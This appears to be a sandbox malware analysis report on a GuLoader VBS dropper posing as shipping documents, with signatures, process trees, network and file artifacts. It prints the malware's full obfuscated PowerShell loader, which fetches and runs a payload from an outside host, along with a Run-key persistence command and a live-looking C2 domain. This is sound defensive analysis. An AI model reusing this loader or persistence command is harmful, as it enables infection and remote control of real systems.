Malware Analysis Report

2025-08-10 19:27

Sample ID 230715-w66h9acd9z
Target SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs
SHA256 d6d6d837cf218e5f89c6eb733437a7a9f8fc74e43545409fd487c16d83808bed
Tags
guloader downloader persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d6d6d837cf218e5f89c6eb733437a7a9f8fc74e43545409fd487c16d83808bed

Threat Level: Known bad

The file SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs was found to be: Known bad.

Malicious Activity Summary

guloader downloader persistence

Guloader,Cloudeye

Checks QEMU agent file

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-15 18:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-15 18:33

Reported

2023-07-15 18:35

Platform

win7-20230712-en

Max time kernel

150s

Max time network

137s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Checks QEMU agent file

Description Indicator Process Target
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Program Files (x86)\internet explorer\ielowutil.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\internet explorer\ielowutil.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2969888527-3102471180-2307688834-1000\Software\Microsoft\Windows\CurrentVersion\Run\Content = "%GULOM% -w 1 $Apenn=(Get-ItemProperty -Path 'HKCU:\\Gulv\\').Undlad;%GULOM% ($Apenn)" C:\Program Files (x86)\internet explorer\ielowutil.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\internet explorer\ielowutil.exe N/A
N/A N/A C:\Program Files (x86)\internet explorer\ielowutil.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\internet explorer\ielowutil.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2984 set thread context of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\internet explorer\ielowutil.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\internet explorer\ielowutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1348 wrote to memory of 2576 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1348 wrote to memory of 2576 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1348 wrote to memory of 2576 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 2984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2984 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
PID 2984 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
PID 2984 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
PID 2984 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
PID 2984 wrote to memory of 632 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"

C:\Program Files (x86)\internet explorer\ielowutil.exe

"C:\Program Files (x86)\internet explorer\ielowutil.exe"

Network

Country Destination Domain Proto
LT 91.244.197.9:80 91.244.197.9 tcp
LT 91.244.197.9:80 91.244.197.9 tcp
LT 91.244.197.9:80 91.244.197.9 tcp
US 8.8.8.8:53 septrem.duckdns.org udp
SE 70.34.197.90:2424 septrem.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp

Files

memory/2576-59-0x0000000002390000-0x0000000002398000-memory.dmp

memory/2576-58-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/2576-60-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/2576-57-0x000000001B1E0000-0x000000001B4C2000-memory.dmp

memory/2576-61-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/2576-62-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/2576-63-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/2576-64-0x00000000025C0000-0x0000000002640000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UZFT6K7SW7KJ2TGXKAR9.temp

MD5 d41c5b5fd5a375b68d9c4693cc12418f
SHA1 759c488ccd2be2ee77ab8af62303e3fbd0e480e1
SHA256 ad2a637d4b29c8d5dda85d9049d1c58ffa861057fce21ba112c725b287eb93d9
SHA512 e8ad0390cd7796de890efd420cb58ce34c003537bd9ec1dcb64f4b3ba98639491019d503e2c7ba605063d454d72484c352be87490d221c2c09d38730e9436a7e

memory/2984-69-0x00000000025E0000-0x0000000002620000-memory.dmp

memory/2984-68-0x0000000073230000-0x00000000737DB000-memory.dmp

memory/2984-67-0x0000000073230000-0x00000000737DB000-memory.dmp

memory/2984-70-0x00000000025E0000-0x0000000002620000-memory.dmp

memory/2576-71-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/2576-74-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/2576-73-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/2576-72-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/2576-82-0x00000000025C0000-0x0000000002640000-memory.dmp

memory/2984-83-0x0000000073230000-0x00000000737DB000-memory.dmp

memory/2984-84-0x00000000025E0000-0x0000000002620000-memory.dmp

memory/2984-85-0x0000000005180000-0x0000000005181000-memory.dmp

memory/2984-86-0x00000000065F0000-0x0000000008C08000-memory.dmp

memory/2984-87-0x00000000065F0000-0x0000000008C08000-memory.dmp

memory/2984-90-0x0000000077140000-0x00000000772E9000-memory.dmp

memory/2984-91-0x0000000077330000-0x0000000077406000-memory.dmp

memory/632-92-0x0000000000620000-0x0000000002C38000-memory.dmp

memory/632-93-0x0000000000620000-0x0000000002C38000-memory.dmp

memory/632-94-0x0000000077140000-0x00000000772E9000-memory.dmp

memory/632-95-0x0000000000620000-0x0000000002C38000-memory.dmp

memory/632-96-0x0000000000620000-0x0000000002C38000-memory.dmp

memory/632-97-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-98-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-99-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-100-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-101-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-102-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-103-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-104-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-105-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-106-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-109-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-110-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-111-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-107-0x0000000000620000-0x0000000002C38000-memory.dmp

memory/632-112-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-113-0x0000000000400000-0x0000000000615000-memory.dmp

memory/2984-115-0x00000000025E0000-0x0000000002620000-memory.dmp

memory/632-114-0x0000000000400000-0x0000000000615000-memory.dmp

memory/2984-117-0x0000000073230000-0x00000000737DB000-memory.dmp

memory/632-116-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-118-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-119-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-120-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-121-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-122-0x0000000000400000-0x0000000000615000-memory.dmp

memory/2576-123-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/632-126-0x0000000077140000-0x00000000772E9000-memory.dmp

memory/632-128-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-129-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-130-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-131-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-132-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-133-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-134-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-135-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-136-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-137-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-139-0x0000000000400000-0x0000000000615000-memory.dmp

memory/632-140-0x0000000000400000-0x0000000000615000-memory.dmp

C:\ProgramData\logwes.dat

MD5 40c7d7c290113ae8f03e65d4095eb7ee
SHA1 d81c98b90ccb5c7ee94d423665195bc17b1dcb6f
SHA256 f3296b3fbb81560e0f1652581aa8eb502e95a4184a8122e50ba647aad60e128a
SHA512 5e3627e362398ac840f6a7c3ec2a8fbc011ae2bf91bd08de15699386fc348c7d8f634971f3bb7c2c2a25ec002db81e61bacf4cbd928b665712e87f5760752f54

C:\ProgramData\logwes.dat

MD5 7c87f79a966e35eb2e8fbda6ce59b804
SHA1 9b9e4afb20b63041277a08ab248700e33934781c
SHA256 9aee7cb2de1e1d4c489e250dd68e59f8e790ee585b4f3c23a8969367af193c58
SHA512 b63f66c071574c566c634d37325f39ed1ab2393579ade0f9ccec368dd78ee5bd8a6ae96afee49277e302206faaa81be27d9cffac4c63bff6322b22a4d361536f

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-15 18:33

Reported

2023-07-15 18:35

Platform

win10v2004-20230703-en

Max time kernel

148s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHIPPING_COPY_DOCUMENTS-QRYTR-282737-OLSKJWEJ_127KB_00000002822333333.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Checks QEMU agent file

Description Indicator Process Target
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Program Files (x86)\internet explorer\ielowutil.exe N/A
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\internet explorer\ielowutil.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Content = "%GULOM% -w 1 $Apenn=(Get-ItemProperty -Path 'HKCU:\\Gulv\\').Undlad;%GULOM% ($Apenn)" C:\Program Files (x86)\internet explorer\ielowutil.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\internet explorer\ielowutil.exe N/A
N/A N/A C:\Program Files (x86)\internet explorer\ielowutil.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\internet explorer\ielowutil.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1236 set thread context of 2936 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\internet explorer\ielowutil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2876 wrote to memory of 456 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 456 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 456 wrote to memory of 1236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 456 wrote to memory of 1236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 456 wrote to memory of 1236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1236 wrote to memory of 1312 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
PID 1236 wrote to memory of 1312 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
PID 1236 wrote to memory of 1312 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
PID 1236 wrote to memory of 2936 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
PID 1236 wrote to memory of 2936 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
PID 1236 wrote to memory of 2936 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
